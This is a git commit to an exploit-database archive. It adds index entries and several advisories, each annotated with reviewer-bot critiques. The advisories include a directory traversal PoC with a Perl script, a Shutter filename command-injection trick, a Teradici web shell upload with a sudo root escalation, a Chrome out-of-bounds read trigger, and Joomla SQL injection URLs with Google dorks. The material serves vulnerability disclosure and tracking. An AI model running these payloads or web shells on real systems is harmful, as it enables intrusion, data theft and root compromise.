DB: 2017-02-23
13 new exploits EasyCom For PHP 4.0.0 - Buffer Overflow (PoC) EasyCom For PHP 4.0.0 - Denial of Service Google Chrome - 'layout' Out-of-Bounds Read Shutter 0.93.1 - Code Execution DiskSavvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection Joomla! Component VehicleManager 3.9 - SQL Injection Joomla! Component RealEstateManager 3.9 - SQL Injection Joomla! Component BookLibrary 3.6.1 - SQL Injection Joomla! Component MediaLibrary Basic 3.5 - SQL Injection Lock Photos Album&Videos Safe 4.3 - Directory Traversal ProjectSend r754 - Insecure Direct Object Reference Teradici Management Console 2.2.0 - Privilege Escalation
This commit is contained in:
parent
ad7bd81657
commit
c7c1c7d92e
14 changed files with 954 additions and 1 deletions
15
files.csv
|
@ -5379,6 +5379,9 @@ id,file,description,date,author,platform,type,port
|
|||
41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
|
||||
41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
|
||||
41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
|
||||
41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8813,6 +8816,7 @@ id,file,description,date,author,platform,type,port
|
|||
41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
|
||||
41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
|
||||
41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
|
||||
41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15279,7 +15283,7 @@ id,file,description,date,author,platform,type,port
|
|||
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
|
||||
41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
|
||||
41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
|
||||
41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
|
||||
41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
|
||||
41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
|
||||
41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
|
||||
41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
|
||||
|
@ -15291,6 +15295,7 @@ id,file,description,date,author,platform,type,port
|
|||
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
|
||||
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
|
||||
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37341,3 +37346,11 @@ id,file,description,date,author,platform,type,port
|
|||
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
|
||||
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
|
||||
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
|
||||
41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41431,platforms/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
|
||||
41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
|
||||
41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
|
||||
41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
|
||||
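Review bot: Two of the new index rows drop preconditions that the advisories they point to state explicitly: 41437 is described as `Teradici Management Console 2.2.0 - Privilege Escalation` although the advisory is titled `Web Shell Upload and Privilege Escalation` and needs an account that can reach the Database Management page, and 41435 is described as `Shutter 0.93.1 - Code Execution` although the advisory itself says user-assisted. Tools that key on the description column (searchsploit, vulnerability scanners) triage on that text, so an `(Authenticated)` / `(User-Assisted)` qualifier in the description would avoid inflating severity downstream. The 41146 rename is the only other change in this section and is cosmetic.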
|
|
|
205
platforms/ios/webapps/41432.txt
Executable file
|
@ -0,0 +1,205 @@
|
|||
Document Title:
|
||||
===============
|
||||
Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2032
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-02-21
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2032
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.8
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store
|
||||
and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do
|
||||
more things in one app and manage your life better!
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2017-02-21: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Galaxy Studio (Mo Wellin)
|
||||
Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
|
||||
The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.
|
||||
|
||||
The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request
|
||||
the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path
|
||||
variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server
|
||||
access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials
|
||||
for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check
|
||||
for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
|
||||
The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able
|
||||
to access with the credentials the service by using a client via http protocol.
|
||||
|
||||
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8.
|
||||
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
|
||||
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] PRE
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] form action
|
||||
|
||||
Affected Module(s):
|
||||
[+] Web-Server File System
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Standard Request:
|
||||
http://localhost:5555/?PRE=action form
|
||||
|
||||
|
||||
PoC: Payload
|
||||
//..//..//..//..//..//..//..//..//%00
|
||||
/../../../../../../../../%00
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
http://localhost:5555/?PRE=action form=/../../../../../../../../%00
|
||||
|
||||
|
||||
PoC: Exploit
|
||||
use strict;
|
||||
use LWP::UserAgent;
|
||||
my $b = LWP::UserAgent->new();
|
||||
my $host = "localhost:5555";
|
||||
print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
|
||||
|
||||
|
||||
--- PoC Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:5555]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Connection[keep-alive]
|
||||
Upgrade-Insecure-Requests[1]
|
||||
Response Header:
|
||||
Date[Di., 21 Feb. 2017 09:21:48 GMT]
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[0]
|
||||
|
||||
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
{
|
||||
"paths" : [
|
||||
"/Picture/Public/path/All Image/"
|
||||
],
|
||||
"folder" : "/Picture/Public/path",
|
||||
"code" : 1
|
||||
}
|
||||
... manipulated
|
||||
|
||||
{
|
||||
"paths" : [
|
||||
],
|
||||
"folder" : "/../../../../../../../../%00",
|
||||
"code" : 1
|
||||
}
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:5555/
|
||||
http://localhost:5555/?PRE
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form
|
||||
action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to
|
||||
prevent further directory traversal attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
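Review bot: The session log does not support the claimed credential disclosure: the exploitation request returns `200` with `Content-Length[0]` and an unknown MIME type, and the JSON shown under "Vulnerable Source" only echoes the traversal string in `folder` with an empty `paths` array, which demonstrates unsanitized path handling but not a read of the SQLite database. The advisory should either include a response body containing actual out-of-tree file content or lower the stated impact and CVSS accordingly. "Remote" here also presumes the app's Wi-Fi sharing server on port 5555 is running and the attacker is on the same network, which belongs in the preconditions. For the fix section, the concrete control is to resolve the requested path against the sharing root and reject any path whose canonical form does not stay under that root, and to reject embedded NUL bytes (`%00`) outright.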
|
||||
|
||||
|
26
platforms/linux/local/41435.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: Shutter user-assisted remote code execution
|
||||
# Date: 2016-12-26
|
||||
# Software Link: http://shutter-project.org/
|
||||
# Version: 0.93.1
|
||||
# Tested on: Ubuntu, Debian
|
||||
# Exploit Author: Prajith P
|
||||
# Website: http://prajith.in/
|
||||
# Author Mail: me@prajith.in
|
||||
# CVE: CVE-2016-10081
|
||||
|
||||
1. Description.
|
||||
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
|
||||
attackers to execute arbitrary commands via a crafted image name that is
|
||||
mishandled during a "Run a plugin" action.
|
||||
|
||||
2. Proof of concept.
|
||||
1) Rename an image to something like "$(firefox)"
|
||||
2) Open the renamed file in shutter
|
||||
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
|
||||
|
||||
3. Solution:
|
||||
https://bugs.launchpad.net/shutter/+bug/1652600
|
||||
|
||||
|
||||
Thanks,
|
||||
Prajithh
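Review bot: The advisory does not name the version that fixes CVE-2016-10081, only linking the Launchpad bug, so a reader cannot tell whether a given Shutter build is still affected; a line such as `# Fixed in: <version from the Launchpad bug>` after `# Version: 0.93.1` would close that gap before the link rots. The `$(firefox)` payload shows the filename reaches a shell via command substitution, so the effective mitigation is for the plugin runner to pass the path as a separate argument (exec/list form) rather than interpolating it into a shell string; that is worth stating in the Solution section. Since the victim must open the file and click "Run a plugin", the finding is user-assisted as the title says, which is narrower than the bare "Code Execution" used for it in the index.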
|
66
platforms/linux/webapps/41437.txt
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
|
||||
# Date: February 22nd, 2017
|
||||
# Exploit Author: hantwister
|
||||
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
|
||||
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
|
||||
# Version: 2.2.0
|
||||
|
||||
|
||||
Users that can access the Settings > Database Management page can achieve code
|
||||
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
|
||||
|
||||
|
||||
Web Shell Upload Vulnerability Overview
|
||||
---------------------------------------
|
||||
|
||||
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
|
||||
malicious archive with a malicious web script that extracts to the known
|
||||
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
|
||||
it is possible to add or modify class files and XML files pertaining to the
|
||||
application.
|
||||
|
||||
|
||||
Privilege Escalation Vulnerability Overview
|
||||
-------------------------------------------
|
||||
|
||||
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
|
||||
has sudo rights to run that file without a password. By manipulating this file,
|
||||
arbitrary code can be run as root.
|
||||
|
||||
|
||||
Exploiting The Vulnerabilities
|
||||
------------------------------
|
||||
|
||||
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
||||
alice:~$ cd runasroot
|
||||
alice:~/runasroot$ msfvenom (snip) > evil
|
||||
alice:~/runasroot$ chmod a+x evil
|
||||
alice:~/runasroot$ nano modify_self_restart.sh
|
||||
|
||||
#!/bin/bash
|
||||
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
|
||||
|
||||
alice:~/runasroot$ chmod a+x modify_self_restart.sh
|
||||
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
|
||||
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>runasroot</title>
|
||||
</head>
|
||||
<body>
|
||||
<pre>
|
||||
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
|
||||
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
|
||||
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
|
||||
</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
|
||||
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
|
||||
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
|
||||
|
||||
Now, choose to upload runasroot.archive through the Database Management page. An
|
||||
error will be displayed that it wasn't a valid archive. Now, navigate to
|
||||
https://IP/console/images/runasroot.gsp
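Review bot: The archive import honours arbitrary member paths, which is what lets a tar entry land under `/opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images`; the server-side fix is to extract into a fresh, randomly named directory outside the deployed webapp tree and reject any member whose canonical path escapes it, which the advisory does not spell out. The root step is a separate sudoers misconfiguration (`jetty` may run a file it owns without a password), fixed by making `/opt/jetty/jetty_self_restart.sh` root-owned and non-writable, not by patching the upload path alone. The PoC also shows the upload is accepted after `openssl enc -aes-256-cbc` with a static passphrase (`-pass pass:4400Dominion`); if that is the same key the console uses to decrypt uploads, the encryption gives confidentiality only and, being unauthenticated CBC, cannot stop a forged archive, which is a third weakness worth naming. Affected versions are given only as "older versions of PCoIP MC 2.x"; a fixed version should be stated.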
|
29
platforms/multiple/dos/41434.html
Executable file
|
@ -0,0 +1,29 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
|
||||
|
||||
Chrome bug:
|
||||
|
||||
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
|
||||
|
||||
PoC:
|
||||
-->
|
||||
|
||||
<style>
|
||||
content { contain: size layout; }
|
||||
</style>
|
||||
<script>
|
||||
function leak() {
|
||||
document.execCommand("selectAll");
|
||||
opt.text = "";
|
||||
}
|
||||
</script>
|
||||
<body onload=leak()>
|
||||
<content>
|
||||
<select>
|
||||
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
|
||||
</select>
|
||||
</content>
|
||||
|
||||
<!--
|
||||
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
|
||||
-->
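Review bot: The file carries no affected or fixed Chrome version, only the two tracker links, so a reader cannot map it to a build; a comment next to the links such as `Affected/fixed builds: see the crbug 671328 tracker entry` would at least point to where that is recorded without inventing a number. The PoC is a crash trigger only: the closing comment says the leaked bytes are reachable via the `unicode-range` descriptor, but no such code is included, so the ASLR-bypass remark is a pointer to further work rather than something this file demonstrates. Because the trigger fires from `onload` with no interaction, it should be opened only in a sandboxed or ASan build.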
|
17
platforms/php/webapps/41427.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_contentmap
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: https://www.turismo.eu/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
|
||||
# Demo: https://www.turismo.eu/itinerari.html
|
||||
# Version: 1.3.8
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
|
||||
# # # # #
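Review bot: The PoC URL carries values copied from the vendor demo (`id=10135`, `Itemid=606`) without marking them as site-specific, so a reader has to guess that only `contentid` is the injection point and the rest must be taken from the target; a comment saying so would prevent failed reproductions. No probe or observed response is recorded, so the injection type (error-based, boolean, time-based) and backend cannot be inferred from the file; at least one concrete probe and the distinguishing response should be included. Since `contentid` is an article id, the component-side fix is to cast it to int before it reaches the query.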
|
22
platforms/php/webapps/41428.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_vehiclemanager
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
|
||||
# Demo: http://ordasvit.com/joomla-vehicle-manager/
|
||||
# Version: 3.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
|
||||
# # # # #
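Review bot: Six parameters are marked `[SQL]` but none carries a probe or an observed response, so it is impossible to tell from the file which of `vcondition`, `transmission`, `listing_type`, `model`, `fuel_type` and `maker` were actually confirmed and which are only candidates; each line should record the probe used and the response difference seen. The `all`/`0` values used for the untouched parameters suggest they are selector fields, so the server-side fix is to validate them against the allowed option set (and cast `catid` to int) rather than concatenating them into the search query. `Itemid=70` is demo-specific and should be flagged as such.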
|
18
platforms/php/webapps/41429.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_realestatemanager
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
|
||||
# Demo: http://ordasvit.com/joomla-real-estate-manager/
|
||||
# Version: 3.9
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
|
||||
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
|
||||
# # # # #
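Review bot: Both URLs use SEF routing with the demo's menu id (`/160/search`) plus fixed date and price ranges, none of which is marked as site-specific, so a reader must re-derive the path for another install; a note that only `listing_status` and `listing_type` are the injection points would help. As with the sibling advisories no probe or response is shown, so the injection type is unconfirmed from the file. Both parameters take values from a fixed option list (`all` in the URL), so validating them against that list server-side is the appropriate fix.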
|
18
platforms/php/webapps/41430.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_booklibrary
|
||||
# Date: 22.02.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
|
||||
# Demo: http://ordasvit.com/joomla-book-library
|
||||
# Version: 3.6.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
